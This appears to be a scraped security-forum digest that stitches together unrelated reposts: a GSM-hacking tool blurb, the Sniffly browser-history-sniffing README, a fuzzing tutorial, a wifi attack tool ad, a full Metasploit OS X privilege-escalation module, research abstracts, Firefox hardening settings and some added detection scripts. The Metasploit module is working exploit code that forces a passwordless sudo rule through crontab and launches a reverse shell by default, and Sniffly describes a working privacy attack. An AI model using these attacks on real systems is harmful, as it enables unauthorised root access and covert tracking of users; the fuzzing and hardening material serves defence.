Maybe better than something done by hand. But Topguw is made to help people who want to learn the hack. This is why several files are made to help GSM reverse-engineering.

Topguw can be downloaded from GitHub at https://github.com/bastienjalbert/topguw. Bastien has also uploaded a video showing his software in action. If you're interested, check Bastien's YouTube channel, as he plans to upload another video soon where he shows himself hacking his own GSM sms/call signals.

Of course remember that hacking into GSM signals is very illegal and if you do this then you must check the legality of doing so in your country and only receive your own messages or messages that are intended for you.

Source: Hacking GSM Signals with an RTL-SDR and Topguw - rtl-sdr.com
-
- 1
-
-
Sniffly

Sniffly is an attack that abuses HTTP Strict Transport Security and Content Security Policy to allow arbitrary websites to sniff a user's browsing history. It has been tested in Firefox and Chrome.

More info available in my ToorCon 2015 slides: https://zyan.scripts.mit.edu/presentations/toorcon2015.pdf.

Demo

Visit http://zyan.scripts.mit.edu/sniffly/ in Firefox/Chrome/Opera with HTTPS Everywhere disabled. If you use an ad blocker, a bunch of advertising domains will probably show up in the "Probably Visited" column (ignore them).

How it works

I recommend reading the inline comments in src/index.js to understand how Sniffly does a timing attack in both FF and Chrome without polluting the local HSTS store. tl;dr version:

1. User visits Sniffly page
2. Browser attempts to load images from various HSTS domains over HTTP
3. Sniffly sets a CSP policy that restricts images to HTTP, so image sources are blocked before they are redirected to HTTPS. This is crucial! If the browser completes a request to the HTTPS site, then it will receive the HSTS pin, and the attack will no longer work when the user visits Sniffly.
4. When an image gets blocked by CSP, its onerror handler is called. In this case, the onerror handler does some fancy tricks to time how long it took for the image to be redirected from HTTP to HTTPS. If this time is on the order of a millisecond, it was an HSTS redirect (no network request was made), which means the user has visited the image's domain before. If it's on the order of 100 milliseconds, then a network request probably occurred, meaning that the user hasn't visited the image's domain.

Finding HSTS hosts

To scrape an included list of sites (util/strict-transport-security.txt, courtesy Scott Helme) to determine which hosts send HSTS headers, do:

$ cd util
$ ./run.sh <number_of_batches> > results.log

where 1 batch is 100 sites. You can override util/strict-transport-security.txt with a different list, such as the full Alexa Top 1M, if you want.
To process and sort the results by max-age, excluding ones with max-age less than 1 day and ones that are preloaded:

$ cd util
$ ./process.py <results_file> > processed.log

Once that's done, you can copy the hosts from processed.log into src/index.js.

Running sploitz

Visiting file:///path/to/sniffly/src/index.html in Chrome should just work. In Firefox, CSP headers using the <meta> tag are apparently not supported yet, so you need to set up a local webserver to serve the CSP HTTP response header. My Nginx server block looks something like this:

server {
    listen 8081;
    server_name localhost;
    location / {
        root /path/to/sniffly/src;
        add_header Content-Security-Policy "img-src http:";
        index index.html;
    }
}

Or in .htaccess:

<IfModule mod_headers.c>
    Header set Content-Security-Policy "img-src http:"
</IfModule>

Or send the header via php. Paste this at the start of the script (and change the name to index.php):

<?php
$csp_rules = "img-src http:";
// Just to ensure maximum compatibility
header('X-WebKit-CSP: '.$csp_rules);
header('X-Content-Security-Policy: '.$csp_rules);
header('Content-Security-Policy: '.$csp_rules);
?>

Caveats

- Not supported yet in Safari, IE, or Chrome on iOS.
- Extensions such as HTTPS Everywhere will mess up results.
- Doesn't work reliably in Tor Browser since timings are rounded to the nearest 100 milliseconds.
- Users with a different HSTS preload list (ex: due to having an older browser) may not see accurate results.

Acknowledgements

- Scott Helme for an initial list of HSTS hosts that he had found so I didn't have to scan the entire Alexa 1M.
- Chris Palmer for advising on how to file a privacy bug in Chrome.
- Dan Kaminsky and WhiteOps for sponsoring the ToorCon trip where this was presented.
- Jan Schaumann and Chris Rohlf for being early testers.
- Everyone who let me sleep on their couch while I did this over my "vacation break". You know who you are!

Source: https://github.com/diracdeltas/sniffly
-
Tutorial - Beginner's Guide to Fuzzing

Part 1: Simple Fuzzing with zzuf

Part 1: zzuf
Part 2: Address Sanitizer
Part 3: american fuzzy lop

The goal of this tutorial is to get the message out that fuzzing is really simple. Many free software projects today suffer from bugs that can easily be found with fuzzing. This has to change and I hope we can make fuzzing an integral part of most projects' development process.

What fuzzing does is that we feed an application with a large number of malformed inputs and look for undesired behaviour, e.g. crashes. We usually do this by taking a valid input and adding random errors to it.

Promising fuzzing targets are tools that provide parsers for a large number of exotic file formats. Let's take ImageMagick as an example. It's a set of command line tools that process images in a large number of file formats. How do we fuzz it?

We start by generating some input samples. It's usually a good idea to fuzz with small files, so first we create a simple image in any format with small dimensions, e.g. a 3x3 pixel PNG. We'll name that example.png

Now we convert that into various other file formats. In this case you can just use ImageMagick itself, or more precisely the tool convert that is part of ImageMagick, to create your example files:

convert example.png example.gif
convert example.png example.xwd
convert example.png example.tga

Use as many as you like (convert -list format will show you all supported formats).

Now we need malformed versions of these example files. Here we start using the tool zzuf. It's a simple fuzzing tool and is available in most Linux distributions.

Full article: https://fuzzing-project.org/tutorial1.html
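To make the "take a valid input and add random errors to it" idea concrete, here is an added Python example of the mechanism zzuf automates; it is neither zzuf nor code from the fuzzing-project tutorial. It flips one bit in a small fraction of the seed's bytes (zzuf's ratio idea), runs a target on each variant, and keeps the inputs that crash it. The toy image parser and its seed file are constructed for the demonstration; `subprocess_target` wraps a real command-line tool the way the tutorial's later steps do, and reports death by signal as a crash.

```python
"""Minimal mutation fuzzer, in the spirit of the zzuf step above.

Added example, not part of the fuzzing-project tutorial and not zzuf itself:
it shows the mechanism (take a valid seed, flip a small fraction of its
bits, run the target, record inputs that crash it). The toy image parser
and the seed file are constructed for the demonstration.
"""
import os
import random
import signal
import subprocess
import tempfile
from typing import Callable, List, Optional, Tuple

Target = Callable[[bytes], None]        # raises on a crash


def mutate(seed: bytes, ratio: float, rng: random.Random) -> bytes:
    """Flip one random bit in roughly `ratio` of the bytes (zzuf's -r idea)."""
    data = bytearray(seed)
    n = min(len(data), max(1, round(len(data) * ratio)))
    for pos in rng.sample(range(len(data)), n):
        data[pos] ^= 1 << rng.randrange(8)
    return bytes(data)


def fuzz_campaign(seed: bytes, target: Target, iterations: int,
                  ratio: float = 0.004, seed_value: int = 0) -> List[Tuple[int, bytes, str]]:
    """Run `iterations` mutated inputs; return (iteration, input, error) for crashes."""
    rng = random.Random(seed_value)     # fixed seed keeps a campaign reproducible
    crashes = []
    for i in range(iterations):
        sample = mutate(seed, ratio, rng)
        try:
            target(sample)
        except Exception as exc:        # any uncaught error counts as a finding
            crashes.append((i, sample, repr(exc)))
    return crashes


def subprocess_target(cmd: List[str], timeout: float = 5.0) -> Target:
    """Wrap an external tool: the sample is written to a temp file passed as the
    last argument; death by signal (SIGSEGV, SIGABRT, ...) is reported as a crash."""
    def run(sample: bytes) -> None:
        fd, path = tempfile.mkstemp(suffix=".fuzz")
        with os.fdopen(fd, "wb") as fh:
            fh.write(sample)
        try:
            proc = subprocess.run(cmd + [path], capture_output=True, timeout=timeout)
        finally:
            os.unlink(path)
        if proc.returncode < 0:
            raise RuntimeError(f"killed by {signal.Signals(-proc.returncode).name}")
    return run


# --- constructed demo target -------------------------------------------------

def toy_image_parser(data: bytes) -> Optional[int]:
    """Trusts its header: reads width*height pixels without checking the length,
    so a corrupted size byte makes it read past the end (IndexError stands in
    for the out-of-bounds read a C parser would suffer)."""
    if data[:4] != b"IMG1":
        return None                     # rejected cleanly, not a crash
    width, height = data[4], data[5]
    return data[6 + width * height - 1] if width * height else 0


def sample_seed() -> bytes:
    """A valid 3x3 'image' in the toy format: magic, width, height, 9 pixels."""
    return b"IMG1" + bytes([3, 3]) + bytes(9)


if __name__ == "__main__":
    found = fuzz_campaign(sample_seed(), toy_image_parser, iterations=300, ratio=0.1, seed_value=7)
    print(f"{len(found)} crashing inputs, first: {found[0] if found else None}")
```

The seed value matters more than it looks: a reproducible campaign lets you re-run exactly the mutation that crashed a real tool once you have rebuilt it with the sanitizer covered in part 2.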
-
Infernal Twin – Automatic Wifi Hacking Tool

Infernal Twin is an automatic wifi hacking tool, basically a Python suite created to aid penetration testers during wireless assessments; it automates many of the common attacks, which can get complicated and hard to manage when executed manually.

The author noticed a gap in the market with there being many tools to automate web application testing and network pen-tests, but nothing really aimed at Wifi apart from some commercial tools. So this is an attempt to create a '1-click' style wifi attack tool, something like Metasploit. A framework with a whole bunch of different attack vectors bundled together in one interface.

Features

- WPA2 hacking
- WEP Hacking
- WPA2 Enterprise hacking
- Wireless Social Engineering
- SSL Strip
- Evil Access Point Creation
- Infernal Wireless
- Report generation (PDF Report, HTML Report)
- Note taking function
- Data is saved into Database
- Network mapping
- MiTM
- Probe Request

The tool leverages the work done on other utilities to avoid reinventing the wheel, popular wifi security tools such as aircrack-ng and SSLStrip.

You can download Infernal Twin here: infernal-twin-master.zip

Or read more here.

Source: http://www.darknet.org.uk/2015/10/infernal-twin-automatic-wifi-hacking-tool/
-
- 3
-
-
Mac OS X 10.9.5 / 10.10.5 rsh/libmalloc Privilege Escalation
Authored by rebel, shandelman116 | Site metasploit.com

This Metasploit module writes to the sudoers file without root access by exploiting rsh and malloc log files. Makes sudo require no password, giving access to su even if root is disabled. Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'timeout'

class Metasploit4 < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::OSX::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation',
      'Description'     => %q{
        This module writes to the sudoers file without root access by exploiting rsh and malloc log files.
        Makes sudo require no password, giving access to su even if root is disabled.
        Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).
      },
      'Author'          => [
        'rebel',         # Vulnerability discovery and PoC
        'shandelman116'  # Copy/paste AND translator monkey
      ],
      'References'      => [
        ['EDB', '38371'],
        ['CVE', '2015-5889']
      ],
      'DisclosureDate'  => 'Oct 1 2015',
      'License'         => MSF_LICENSE,
      # Want to ensure that this can be used on Python Meterpreter sessions as well
      'Platform'        => ['osx', 'python'],
      'Arch'            => [ARCH_X86_64, ARCH_PYTHON],
      'SessionTypes'    => ['shell', 'meterpreter'],
      'Privileged'      => true,
      'Targets'         => [
        ['Mac OS X 10.9.5-10.10.5', {}]
      ],
      'DefaultTarget'   => 0,
      'DefaultOptions'  => { 'PAYLOAD' => 'osx/x64/shell_reverse_tcp' }
    ))

    register_options(
      [
        OptInt.new('WaitTime', [true, 'Seconds to wait for exploit to work', 60]),
        OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
      ], self.class)
  end

  def exploit
    # Check OS
    os_check

    # Check if crontab file existed already so it can be restored at cleanup
    if file_exist? "/etc/crontab"
      @crontab_original = read_file("/etc/crontab")
    else
      @crontab_original = nil
    end

    # Writing payload
    if payload.arch.include? ARCH_X86_64
      vprint_status("Writing payload to #{payload_file}.")
      write_file(payload_file, payload_source)
      vprint_status("Finished writing payload file.")
      register_file_for_cleanup(payload_file)
    elsif payload.arch.include? ARCH_PYTHON
      vprint_status("No need to write payload. Will simply execute after exploit")
      vprint_status("Payload encoded is #{payload.encoded}")
    end

    # Run exploit
    sploit

    # Execute payload
    print_status('Executing payload...')
    if payload.arch.include? ARCH_X86_64
      cmd_exec("chmod +x #{payload_file}; #{payload_file} & disown")
    elsif payload.arch.include? ARCH_PYTHON
      cmd_exec("python -c \"#{payload.encoded}\" & disown")
    end
    vprint_status("Finished executing payload.")
  end

  def os_check
    # Get sysinfo
    sysinfo = get_sysinfo

    # Make sure it's OS X (Darwin)
    unless sysinfo["Kernel"].include? "Darwin"
      print_warning("The target system does not appear to be running OS X!")
      print_warning("Kernel information: #{sysinfo['Kernel']}")
      return
    end

    # Make sure it's not greater than 10.5 or less than 9.5
    version = sysinfo["ProductVersion"]
    minor_version = version[3...version.length].to_f
    unless minor_version >= 9.5 && minor_version <= 10.5
      print_warning("The target version of OS X does not appear to be compatible with the exploit!")
      print_warning("Target is running OS X #{sysinfo['ProductVersion']}")
    end
  end

  def sploit
    user = cmd_exec("whoami").chomp
    vprint_status("The current effective user is #{user}. Starting the sploit")

    # Get size of sudoers file
    sudoer_path = "/etc/sudoers"
    size = get_stat_size(sudoer_path)

    # Set up the environment and command for spawning rsh and writing to crontab file
    rb_script = "e={\"MallocLogFile\"=>\"/etc/crontab\",\"MallocStackLogging\"=>\"yes\",\"MallocStackLoggingDirectory\"=>\"a\n* * * * * root echo \\\"ALL ALL=(ALL) NOPASSWD: ALL\\\" >> /etc/sudoers\n\n\n\n\n\"}; Process.spawn(e,[\"/usr/bin/rsh\",\"rsh\"],\"localhost\",[:out, :err]=>\"/dev/null\")"
    rb_cmd = "ruby -e '#{rb_script}'"

    # Attempt to execute
    print_status("Attempting to write /etc/crontab...")
    cmd_exec(rb_cmd)
    vprint_status("Now to check whether the script worked...")

    # Check whether it worked
    crontab = cmd_exec("cat /etc/crontab")
    vprint_status("Reading crontab yielded the following response: #{crontab}")
    unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
      vprint_error("Bad news... it did not write to the file.")
      fail_with(Failure::NotVulnerable, "Could not successfully write to crontab file.")
    end
    print_good("Successfully wrote to crontab file!")

    # Wait for sudoers to change
    new_size = get_stat_size(sudoer_path)
    print_status("Waiting for sudoers file to change...")

    # Start timeout block
    begin
      Timeout.timeout(datastore['WaitTime']) {
        while new_size <= size
          Rex.sleep(1)
          new_size = get_stat_size(sudoer_path)
        end
      }
    rescue Timeout::Error
      fail_with(Failure::TimeoutExpired, "Sudoers file size has still not changed after waiting the maximum amount of time. Try increasing WaitTime.")
    end
    print_good("Sudoers file has changed!")

    # Confirming root access
    print_status("Attempting to start root shell...")
    cmd_exec("sudo -s su")
    user = cmd_exec("whoami")
    unless user.include? "root"
      fail_with(Failure::UnexpectedReply, "Unable to acquire root access. Whoami returned: #{user}")
    end
    print_good("Success! Acquired root access!")
  end

  def get_stat_size(file_path)
    cmd = "env -i [$(stat -s #{file_path})] bash -c 'echo $st_size'"
    response = cmd_exec(cmd)
    vprint_status("Response to stat size query is #{response}")
    begin
      size = Integer(response)
      return size
    rescue ArgumentError
      fail_with(Failure::UnexpectedReply, "Could not get stat size!")
    end
  end

  def payload_source
    if payload.arch.include? ARCH_X86_64
      return Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    elsif payload.arch.include? ARCH_PYTHON
      return payload.encoded
    end
  end

  def payload_file
    @payload_file ||= "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
  end

  def cleanup
    vprint_status("Starting the cron restore process...")
    super

    # Restore crontab back to its original state
    # If we don't do this, then cron will continue to append the no password rule to sudoers.
    if @crontab_original.nil?
      # Erase crontab file and kill cron process since it did not exist before
      vprint_status("Killing cron process and removing crontab file since it did not exist prior to exploit.")
      rm_ret = cmd_exec("rm /etc/crontab 2>/dev/null; echo $?")
      if rm_ret.chomp.to_i == 0
        vprint_good("Successfully removed crontab file!")
      else
        print_warning("Could not remove crontab file.")
      end
      Rex.sleep(1)
      kill_ret = cmd_exec("killall cron 2>/dev/null; echo $?")
      if kill_ret.chomp.to_i == 0
        vprint_good("Successfully killed cron!")
      else
        print_warning("Could not kill cron process.")
      end
    else
      # Write back the original content of crontab
      vprint_status("Restoring crontab file back to original contents. No need for it anymore.")
      cmd_exec("echo '#{@crontab_original}' > /etc/crontab")
    end
    vprint_status("Finished the cleanup process.")
  end
end
```

Source: https://packetstormsecurity.com/files/134087/rsh_libmalloc.rb.txt
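The module above leaves two artefacts a host check can look for: a system crontab that contains a malloc stack-log header plus a cron entry appending to /etc/sudoers, and the NOPASSWD rule itself once cron has fired. The following audit is an added example, not part of the Metasploit module or the exploit; it runs over sudoers/crontab text (the constructed samples stand in for file contents) and reports each finding with its line number.

```ruby
# Added example, not part of the module above: audit sudoers and crontab text
# for the traces this technique leaves behind: a cron entry that appends to
# /etc/sudoers, non-cron garbage in /etc/crontab (the malloc log header), and a
# passwordless ALL rule in sudoers. Each finding carries its line number.

NOPASSWD_ALL = /^\s*(\S+)\s+(\S+)\s*=\s*\(([^)]*)\)\s*NOPASSWD:\s*ALL\s*$/
CRON_ENTRY   = /^\s*(\S+\s+){5}\S+\s+(.*)$/  # min hour dom mon dow user command
CRON_ASSIGN  = /^\s*[A-Za-z_]\w*=/           # e.g. SHELL=/bin/sh, PATH=...
SUDOERS_REDIRECT = %r{>>?\s*/etc/sudoers}

# sudoers lines granting NOPASSWD: ALL, with the user/host/runas triple.
def sudoers_findings(text)
  findings = []
  text.each_line.with_index(1) do |line, no|
    next unless (m = NOPASSWD_ALL.match(line))
    findings << { line: no, user: m[1], host: m[2], runas: m[3] }
  end
  findings
end

# System crontab lines that write into /etc/sudoers, or that are neither a
# comment, a blank, a variable assignment nor a six-field cron entry.
def crontab_findings(text)
  findings = []
  text.each_line.with_index(1) do |line, no|
    next if line.strip.empty? || line.lstrip.start_with?('#') || CRON_ASSIGN.match?(line)
    if (m = CRON_ENTRY.match(line))
      findings << { line: no, kind: :writes_sudoers, command: m[2] } if SUDOERS_REDIRECT.match?(m[2])
    else
      findings << { line: no, kind: :not_cron_syntax, text: line.chomp }
    end
  end
  findings
end

# Constructed samples modelled on what the module above leaves on disk.
SAMPLE_CRONTAB = "a\n* * * * * root echo \"ALL ALL=(ALL) NOPASSWD: ALL\" >> /etc/sudoers\n\n"
SAMPLE_SUDOERS = "root    ALL=(ALL) ALL\n%admin  ALL=(ALL) ALL\nALL ALL=(ALL) NOPASSWD: ALL\n"

if __FILE__ == $PROGRAM_NAME
  crontab_findings(SAMPLE_CRONTAB).each { |f| puts "crontab:#{f[:line]} #{f[:kind]}" }
  sudoers_findings(SAMPLE_SUDOERS).each { |f| puts "sudoers:#{f[:line]} #{f[:user]} #{f[:host]}=(#{f[:runas]})" }
end
```

On a live host, feed it `File.read('/etc/sudoers')` and `File.read('/etc/crontab')`; a `%admin` NOPASSWD line is reported too, so review findings against local policy rather than treating every hit as compromise.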
-
Run-DMA
Authors: Michael Rushanan and Stephen Checkoway, Johns Hopkins University

Abstract: Copying data from devices into main memory is a computationally-trivial, yet time-intensive, task. In order to free the CPU to perform more interesting work, computers use direct memory access (DMA) engines—a special-purpose piece of hardware—to transfer data into and out of main memory. We show that the ability to chain together such memory transfers, as provided by commodity hardware, is sufficient to perform arbitrary computation. Further, when hardware peripherals can be accessed via memory-mapped I/O, they are accessible to "DMA programs." To demonstrate malicious behavior, we build a proof-of-concept DMA rootkit that modifies kernel objects in memory to perform privilege escalation for target processes.

Source: https://www.usenix.org/conference/woot15/workshop-program/presentation/rushanan
-
Weird New Tricks for Browser Fingerprinting
yan (@bcrypt)
ToorCon 2015

Tracking web users is all the rage:
- Show ads!
- Inject QUANTUM malware
- Cybercatch cybercriminals
- Gather website analytics
- Detect fraud / droidnets
- Enforce paywalls
- etc.

Download: https://zyan.scripts.mit.edu/presentations/toorcon2015.pdf
-
[h=1]CppCon 2015: Bjarne Stroustrup “Writing Good C++14”[/h]
Published on 23 Sep 2015 by cppcon | The C++ Conference

Presentation Slides, PDFs, Source Code and other presenter materials are available at: https://github.com/isocpp/CppCoreGuid...

How do we use C++14 to make our code better, rather than just different? How do we do so on a grand scale, rather than just for exceptional programmers? We need guidelines to help us progress from older styles, such as “C with Classes”, C, “pure OO”, etc. We need articulated rules to save us from each having to discover them for ourselves. Ideally, they should be machine-checkable, yet adjustable to serve specific needs.

In this talk, I describe a style of guidelines that can be deployed to help most C++ programmers. There could not be a single complete set of rules for everybody, but we are developing a set of rules for most C++ use. This core can be augmented with rules for specific application domains such as embedded systems and systems with stringent security requirements. The rules are prescriptive rather than merely sets of prohibitions, and about much more than code layout. I describe what the rules currently cover (e.g., interfaces, functions, resource management, and pointers). I describe tools and a few simple classes that can be used to support the guidelines.

The core guidelines and a guideline support library reference implementation will be open source projects freely available on all major platforms (initially, GCC, Clang, and Microsoft).

Videos Filmed & Edited by Bash Films: Bash Films | Award-Winning Video Production
-
[h=1]Firefix: Hardening Firefox for Privacy[/h]

While Tor officially recommends using their Tor-hardened version of Firefox, it doesn't come without its share of problems, including forensic artifacts, as well as other potential vulnerabilities. As the Tor browser is not often updated as quickly as Firefox itself, one may find benefit in using Tor with the latest version of Firefox…

Running Tor apart from the browser isn't difficult, and the Tor command-line client can be easily installed on most operating systems either through package managers (such as MacPorts) or by compiling from sources. With Tor running in a terminal window, Firefox can be easily made to proxy through it. For example:

```
network.proxy.socks = "127.0.0.1"
network.proxy.socks_port = 9050
network.proxy.socks_remote_dns = true
network.proxy.type = 1
```

One of the benefits of running Tor yourself is the ability to use other applications (other than a browser) with it, by using a popular tool named torsocks, which can proxy many applications through Tor easily.

Back to Firefox: if you're going to use the official version of the browser, there are a number of configuration fixes you'll want to make to protect your privacy. In addition to hardening Firefox, it's always a good idea to install a local firewall such as Little Snitch, and create a profile that blocks all outgoing traffic on your machine, except for Tor traffic. Alternatively, there is also a personal onion router project to create a dedicated router.

Of course, you don't need to be running Tor to want to harden Firefox. There are a number of other benefits to hardening Firefox as well: to reduce the exposure of your personal information as you browse, to reduce the forensic artifacts left behind on your machine, and to reduce your attack surface, to name a few. Here is a good list of Firefox settings to start with that will help improve privacy.

NOTE: Use at your own risk. I make no warranties about any of this.

```
accessibility.typeaheadfind.flashBar = 0
app.update.auto = false
app.update.disable_button.showUpdateHistory = false
browser.privatebrowsing.autostart = true
browser.sessionstore.restore_on_demand = false
browser.shell.checkDefaultBrowser = false
browser.tabs.loadInBackground = false
datareporting.healthreport.uploadEnabled = false
datareporting.healthreport.service.enabled = false
dom.ipc.plugins.flash.subprocess.crashreporter.enabled = false
dom.ipc.plugins.reportCrashURL = false
dom.w3c_touch_events.expose = false
media.peerconnection.enabled = false
media.peerconnection.video.enabled = false
network.cookie.cookieBehavior = 1
network.websocket.enabled = false
pdfjs.previousHandler.alwaysAskBeforeHandling = true
pdfjs.previousHandler.preferredAction = 4
places.history.enabled = false
plugins.notifyMissingFlash = false
pref.downloads.disable_button.edit_actions = false
security.ssl3.ecdhe_ecdsa_rc4_128_sha = false
security.ssl3.ecdhe_rsa_rc4_128_sha = false
security.ssl3.rsa_rc4_128_md5 = false
security.ssl3.rsa_rc4_128_sha = false
security.ssl3.rsa_des_ede3_sha = false
security.ssl.require_safe_negotiation = true
security.ssl.treat_unsafe_negotiation_as_broken = true
security.tls.version.min = 1
browser.formfill.enable = false
browser.cache.disk.enable = false
browser.cache.disk_cache_ssl = false
browser.cache.offline.enable = false
dom.event.clipboardevents.enabled = false
geo.enabled = false
network.cookie.lifetimePolicy = 2
network.dnsCacheExpiration = 0
network.dnsCacheEntries = 0
browser.urlBar.matchBehavior = 2
browser.sessionstore.resume_from_crash = false
browser.sessionstore.enabled = false
browser.sessionhistory.max_entries = 0
layout.spellcheckDefault = 0
browser.newtabpage.directory.ping = ""
browser.newtabpage.directory.source = ""
browser.newtabpage.enabled = false
browser.newtabpage.enhanced = false
browser.search.suggest.enabled = false
datareporting.policy.dataSubmissionEnabled = false
dom.storage.enabled = false
network.prefetch-next = false
plugin.state.flash = 0
plugin.state.quicktime = 0
plugin.state.silverlight = 0
plugins.click_to_play = true
browser.sessionstore.privacy_level = 2
browser.sessionstore.privacy_level_deferred = 2
privacy.trackingprotection.enabled = true
toolkit.telemetry.enabled = false
extensions.getAddons.cache.enabled = false
extensions.blocklist.enabled = false
```

Source: Firefix: Hardening Firefox for Privacy | Zdziarski's Blog of Things
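Setting these by hand in about:config is error-prone and silently drifts after updates; a user.js file in the profile directory re-applies them on every start. The script below is an added example (not from the post or from Zdziarski): it parses a prefs.js/user.js, compares it against a hand-picked subset of the values above (including the Tor SOCKS settings), and renders user.js lines for anything missing or different. The prefs.js sample is constructed, not taken from a real profile.

```python
import json
import re

# Added example, not from the original post: audit a Firefox prefs.js against a
# subset of the hardening values listed above and render user.js lines for every
# pref that is missing or set differently. Extend HARDENING_PREFS as needed.
HARDENING_PREFS = {
    "privacy.trackingprotection.enabled": True,
    "media.peerconnection.enabled": False,
    "geo.enabled": False,
    "network.prefetch-next": False,
    "network.cookie.cookieBehavior": 1,
    "security.tls.version.min": 1,
    "toolkit.telemetry.enabled": False,
    "network.proxy.type": 1,
}
# One prefs.js / user.js line: user_pref("name", value);
PREF_RE = re.compile(r'^\s*user_pref\("([^"]+)",\s*(.+?)\);\s*$')

def parse_prefs(text):
    """Map pref name -> value; Firefox literals are valid JSON, others kept raw."""
    prefs = {}
    for line in text.splitlines():
        m = PREF_RE.match(line)
        if m:
            name, raw = m.groups()
            try:
                prefs[name] = json.loads(raw)
            except ValueError:
                prefs[name] = raw
    return prefs

def audit(prefs):
    """(name, current, wanted) for every hardening pref that is absent or differs."""
    # Compare type as well as value: a pref stored as true must not satisfy an int 1.
    return [(n, prefs.get(n), w) for n, w in HARDENING_PREFS.items()
            if not (type(prefs.get(n)) is type(w) and prefs.get(n) == w)]

def user_js(findings):
    """Render findings as user.js lines, which Firefox re-applies on every start."""
    return "\n".join(f'user_pref("{n}", {json.dumps(w)});' for n, _, w in findings)

# Constructed prefs.js fragment standing in for a default profile (not real data).
SAMPLE_PREFS_JS = """\
user_pref("privacy.trackingprotection.enabled", false);
user_pref("media.peerconnection.enabled", true);
user_pref("network.cookie.cookieBehavior", 1);
user_pref("security.tls.version.min", 1);
user_pref("network.proxy.type", 0);
"""
```

Run `print(user_js(audit(parse_prefs(open(path_to_prefs_js).read()))))` against a profile and append the output to that profile's user.js.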
-
Permanent ban for both of you.